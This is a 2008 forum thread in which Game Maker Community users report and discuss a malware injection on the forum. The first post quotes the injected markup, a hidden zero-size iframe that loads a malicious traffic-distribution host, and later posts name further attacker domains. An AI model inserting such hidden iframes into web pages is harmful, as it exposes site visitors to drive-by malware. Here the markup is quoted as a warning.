Game Maker Community YoYo Games

Welcome Guest ( Log In | Register )

> Community Forum Rules

This forum is meant for discussions about this community. Make sure that you READ these rules prior to posting. Also, the General GMC Rules apply here too.

2 Pages V   1 2 >  
Closed TopicStart new topic
Malware Alert, Malware warning when visiting gmc.yoyogames.com
Hach-Que
post Sep 7 2008, 12:11 PM
Post #1


RoketGames Admin
Group Icon

Group: GMC Member
Posts: 1855
Joined: 8-December 04
From: Roket Enterprises
Member No.: 17533



While browsing the GMC in Google Chrome, I suddenly got a malware warning from my browser. You'll only see this notice in Google Chrome, but I've checked with other people on my IM list, and they are receiving the same notice.


UPDATE:
Christian Sciberras has found the location of the "hack".
QUOTE (Update)
<a href="http://www.yoyogames.com/make">Game Maker Home <iframe src="http://yourtraff.biz/tds/in.cgi?20" width="0" height="0" style="display:none"></iframe></a>


UPDATE 2:
Firefox does show the warning, except they show it in the IFrame, whereas Google Chrome shows it over the entire site rendering, so it's only picked up in Google Chrome.

UPDATE 3:
If you are using Internet Explorer, then you are vunerable to this attack. Either use another browser, or add yourtraff.biz to your block list, like displayed. In either case, run a virus/malware scan straight away.



This post has been edited by Hach-Que: Sep 7 2008, 12:23 PM
Go to the top of the page
 
+Quote Post
uuf6429
post Sep 7 2008, 12:13 PM
Post #2


Covac Software
Group Icon

Group: GMC Member
Posts: 2708
Joined: 3-July 06
From: Gozo, Malta, Europe
Member No.: 53953



The hack is there on all browsers.

I was just browsing this, so I say the site got hacked in the last 5 minutes or so (1:10PM).


IMPORTANT:
I suggest the forums are shutdown temporally.


This post has been edited by uuf6429: Sep 7 2008, 12:14 PM
Go to the top of the page
 
+Quote Post
Hach-Que
post Sep 7 2008, 12:15 PM
Post #3


RoketGames Admin
Group Icon

Group: GMC Member
Posts: 1855
Joined: 8-December 04
From: Roket Enterprises
Member No.: 17533



I'm quite well aware of this; the warning is only visible in Google Chrome though.
Go to the top of the page
 
+Quote Post
hiro-niro
post Sep 7 2008, 12:18 PM
Post #4


I'm Looney for da Lunar!
Group Icon

Group: GMC Member
Posts: 1270
Joined: 29-May 07
From: USA
Member No.: 79823



I thought they couldn't even use Iframe tags on IBM fourms? Can't the Admins just disable Iframes?
Go to the top of the page
 
+Quote Post
uuf6429
post Sep 7 2008, 12:19 PM
Post #5


Covac Software
Group Icon

Group: GMC Member
Posts: 2708
Joined: 3-July 06
From: Gozo, Malta, Europe
Member No.: 53953



It was not created by any user.

The iframe is embedded inside the forum code.

This post has been edited by uuf6429: Sep 7 2008, 12:19 PM
Go to the top of the page
 
+Quote Post
osl
post Sep 7 2008, 12:19 PM
Post #6


GMC Member
Group Icon

Group: GMC Member
Posts: 152
Joined: 5-August 08
Member No.: 112253



I got it. Luckily my firewall and antivirus stopped it. It comes up telling me, and saying jar cache... then a certain number??? It seems like the gmc is under attack

EDIT: It says loading from yourtraff.biz at the bottom? and augreat.mine.nu

This post has been edited by osl: Sep 7 2008, 12:41 PM
Go to the top of the page
 
+Quote Post
uuf6429
post Sep 7 2008, 12:24 PM
Post #7


Covac Software
Group Icon

Group: GMC Member
Posts: 2708
Joined: 3-July 06
From: Gozo, Malta, Europe
Member No.: 53953



Now, now don't go on inventing theories.
This is surely a small scale attack otherwise we would have ended up with no forum till the next day, by which time we would learn that it's practically weaped out.


Edit: It seems to have been fixed.
Edit: No it's back :S

This post has been edited by uuf6429: Sep 7 2008, 12:27 PM
Go to the top of the page
 
+Quote Post
osl
post Sep 7 2008, 12:27 PM
Post #8


GMC Member
Group Icon

Group: GMC Member
Posts: 152
Joined: 5-August 08
Member No.: 112253



QUOTE (uuf6429 @ Sep 7 2008, 01:24 PM) *
Now, now don't go on inventing theories.
This is surely a small scale attack otherwise we would have ended up with no forum till the next day, by which time we would learn that it's practically weaped out.

Its not a theory. Try refreshing the main page and then look at the bar just above the windows star bar. Then it does say downloading from sites other than the ones I'm on
Edit: It isn't fixed on mine

This post has been edited by osl: Sep 7 2008, 12:28 PM
Go to the top of the page
 
+Quote Post
uuf6429
post Sep 7 2008, 12:29 PM
Post #9


Covac Software
Group Icon

Group: GMC Member
Posts: 2708
Joined: 3-July 06
From: Gozo, Malta, Europe
Member No.: 53953



Hehe why do you think it's malware?
It's got to download something to actually attack your computer.

Fortunately, my good ol' software does a good job keeping out the bad sh*t.
Go to the top of the page
 
+Quote Post
spacerat
post Sep 7 2008, 12:37 PM
Post #10


GMC Member
Group Icon

Group: GMC Member
Posts: 274
Joined: 20-January 04
From: Hobbitland
Member No.: 4964



God damn you beat me to it, I was going to create a topic about this sad.gif
Well I'll include a screen shot anyway for good measure.

EDIT:
QUOTE (Hach-Que @ Sep 7 2008, 01:11 PM) *
If you are using Internet Explorer, then you are vunerable to this attack. Either use another browser, or add yourtraff.biz to your block list, like displayed. In either case, run a virus/malware scan straight away.


Wrong. The only correct advice is:

If you are using Internet Explorer: Use another browser.


This post has been edited by spacerat: Sep 7 2008, 12:42 PM
Go to the top of the page
 
+Quote Post
uuf6429
post Sep 7 2008, 12:39 PM
Post #11


Covac Software
Group Icon

Group: GMC Member
Posts: 2708
Joined: 3-July 06
From: Gozo, Malta, Europe
Member No.: 53953



WARNING!!

Everybody leave this forum now!!
I just analayzed their code, and it seems that just by letting this thing running (without an on-access scanner like Avast's) it will grab pages containing info from google services including:
Gmail
GAnalytics
Orkut

This post has been edited by uuf6429: Sep 7 2008, 12:41 PM
Go to the top of the page
 
+Quote Post
Tuntis
post Sep 7 2008, 12:41 PM
Post #12


I am stupid
Group Icon

Group: GMC Member
Posts: 2116
Joined: 27-October 03
From: Finland
Member No.: 707



Is it just me or do I recall this happening many times before?
Go to the top of the page
 
+Quote Post
spacerat
post Sep 7 2008, 12:43 PM
Post #13


GMC Member
Group Icon

Group: GMC Member
Posts: 274
Joined: 20-January 04
From: Hobbitland
Member No.: 4964



QUOTE (uuf6429 @ Sep 7 2008, 01:39 PM) *
WARNING!!

Everybody leave this forum now!!
I just analayzed their code, and it seems that just by letting this thing running (without an on-access scanner like Avast's) it will grab pages containing info from google services including:
Gmail
GAnalytics
Orkut


Can you prove this?
Go to the top of the page
 
+Quote Post
Un_t0uch
post Sep 7 2008, 12:44 PM
Post #14


GMC Member
Group Icon

Group: GMC Member
Posts: 716
Joined: 1-November 07
From: ~~~~~~~~~~~~~~~ Cool: Yes
Member No.: 92008



It just happened today.
I was browsing GMC yesterday and it didn't happen.

EDIT:

the site is rivatos.net, now.

This post has been edited by Un_t0uch: Sep 7 2008, 12:49 PM
Go to the top of the page
 
+Quote Post
uuf6429
post Sep 7 2008, 12:52 PM
Post #15


Covac Software
Group Icon

Group: GMC Member
Posts: 2708
Joined: 3-July 06
From: Gozo, Malta, Europe
Member No.: 53953



QUOTE
Is it just me or do I recall this happening many times before?
There's been other attempts, but shouldn't each new hack be fixed?
The point is, with this they can do anything on the forum at the moment.
Most browsers follow iframes blindly. Only an antivirus can stop them. Unless it's a special browser like Chrome.

QUOTE
Can you prove this?
Try downloading their code. Then using some common sense (and knowldge of javascript), decode the existing obfuscated javascript into normal javascript. Keep doing this for all new links (of course DO NOT browse the links with your browser).
Finally, you may follow up to pages which show your gmail messages (for example).

Edit: @Un_t0uch: The main site is "yourtraff.biz" but it keeps making new iframes to other sites like the one you mentioned. There is one tiny hole: the iframe. Through it, any other site affiliated/related to "yourtraff.biz" can add their own code.
What triggered this notice is the virus on "rivatos.net". But as said, the hole is elsewhere.

This post has been edited by uuf6429: Sep 7 2008, 12:55 PM
Go to the top of the page
 
+Quote Post
NickToony
post Sep 7 2008, 12:52 PM
Post #16


GMC Member
Group Icon

Group: GMC Member
Posts: 502
Joined: 13-April 07
From: North East England
Member No.: 76225



It's stopped showing the message for me in Chrome happy.gif
Go to the top of the page
 
+Quote Post
them4n!ac
post Sep 7 2008, 12:54 PM
Post #17


GMC Member
Group Icon

Group: GMC Member
Posts: 1184
Joined: 25-March 07
Member No.: 74405




I see this too..
This proves that we can't live without an antivirus because some idiots think they're smart and edit the page.
I hate them all.
Go to the top of the page
 
+Quote Post
uuf6429
post Sep 7 2008, 12:57 PM
Post #18


Covac Software
Group Icon

Group: GMC Member
Posts: 2708
Joined: 3-July 06
From: Gozo, Malta, Europe
Member No.: 53953



AS I SAID if that site "rivatos.net" is removed, you won't see the virus warning anymore BUT the security hole is still there.
Go to the top of the page
 
+Quote Post
osl
post Sep 7 2008, 12:59 PM
Post #19


GMC Member
Group Icon

Group: GMC Member
Posts: 152
Joined: 5-August 08
Member No.: 112253



It is still in Internet explorer, but it seems like it is from a variety of sites. rivatos.net, augreat.mine.nu and yourtraff.biz seem as if they are behind it. And anytime I upload one of these pages... multiple trojans appear

QUOTE
AS I SAID if that site "rivatos.net" is removed, you won't see the virus warning anymore BUT the security hole is still there.


I still get it... even though I've removed rivatos.net.
I advise everyone to block augreat.mine.nu too

This post has been edited by osl: Sep 7 2008, 01:05 PM
Go to the top of the page
 
+Quote Post
samscam
post Sep 7 2008, 01:05 PM
Post #20


GMC Member
Group Icon

Group: GMC Member
Posts: 569
Joined: 10-June 06
From: â–ºFlanders, Belgium
Member No.: 52068



Damn, I just wanted to make a topic about it tongue.gif I hope Smarty (Because his comment is below that code) will do something about it, and I hope it will happen fast, because it's annoying. I wonder why there's still no admin reaction...
Go to the top of the page
 
+Quote Post

2 Pages V   1 2 >
Closed TopicStart new topic
1 User(s) are reading this topic (1 Guests and 0 Anonymous Users)
0 Members:

 



RSS Lo-Fi Version Time is now: 22nd November 2009 - 12:45 AM